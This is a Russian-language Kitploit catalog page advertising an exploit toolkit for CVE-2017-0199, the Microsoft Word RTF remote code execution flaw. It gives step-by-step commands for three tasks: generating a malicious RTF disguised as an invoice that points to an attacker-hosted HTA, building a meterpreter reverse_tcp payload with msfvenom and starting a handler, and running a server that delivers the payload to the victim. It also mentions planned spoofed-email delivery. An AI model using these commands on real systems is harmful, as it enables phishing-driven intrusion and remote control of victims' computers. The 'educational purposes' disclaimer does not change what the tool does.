Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration. | Kitploit
Инструменты/GitHubGitHub/exploit-install/cve-2017-0199
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubexploit-install/cve-2017-0199

CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
799 лет назадЕщё не проверено

Эксплойт-комплект CVE-2017-0199 - v2.0

Эксплойт-комплект CVE-2017-0199 - v2.0 — это удобный скрипт на Python, который предоставляет быстрый и эффективный способ эксплуатации уязвимости Microsoft RTF RCE. Он может сгенерировать вредоносный RTF-файл и доставить полезную нагрузку metasploit / meterpreter жертве без сложной настройки.

Видеоурок

https://youtu.be/42LjG7bAvpg

Примечание к выпуску:

В скрипт добавлены следующие возможности:

root@kitploit:~
- Генерация вредоносного RTF-файла с помощью комплекта
- Запуск комплекта в режиме эксплуатации в качестве мини-сервера HTA + Web

Версия: Python 2.7.13

Будущий выпуск:

Разрабатывается следующая функция:

root@kitploit:~
- Автоматическая отправка сгенерированного вредоносного RTF-файла жертве с помощью подмены email
	

Пример:

  • Шаг 1: Сгенерируйте вредоносный RTF-файл с помощью следующей команды и отправьте его жертве

    root@kitploit:~
      Синтаксис:
    
      # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    
      Пример:
    
      # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
    
  • Шаг 2 (опционально, если используется полезная нагрузка MSF): Сгенерируйте полезную нагрузку metasploit и запустите обработчик

    root@kitploit:~
      Пример:
    
      Генерация полезной нагрузки:
    
      # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    
      Запуск обработчика:
    
      # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
    
  • Шаг 3: Запустите комплект в режиме эксплуатации для доставки полезных нагрузок

    root@kitploit:~
      Синтаксис:
    
      # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    
      Пример:
    
      # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
    

Аргументы командной строки:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)

Modes:

-M gen                                          Generate Malicious RTF file only

     Generate malicious RTF file:

      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

      -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.

                                             For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and

                                             will be requested once victim will open malicious RTF file.
-M exp                                          Start exploitation mode

     Exploitation:

      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

Отказ от ответственности

Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Применяются стандартные оговорки, особенно то, что я (bhdresh) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержание или неправильное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), причинённый использованием этих программ, не является ответственностью bhdresh.

Благодарности

@nixawk за образец RTF, @bhdresh

Ошибки, проблемы, запросы функций

Очевидно, я не являюсь разработчиком на полную ставку, поэтому возможны некоторые сбои.

Пожалуйста, сообщайте об ошибках и проблемах на [email protected]

Скачать инструмент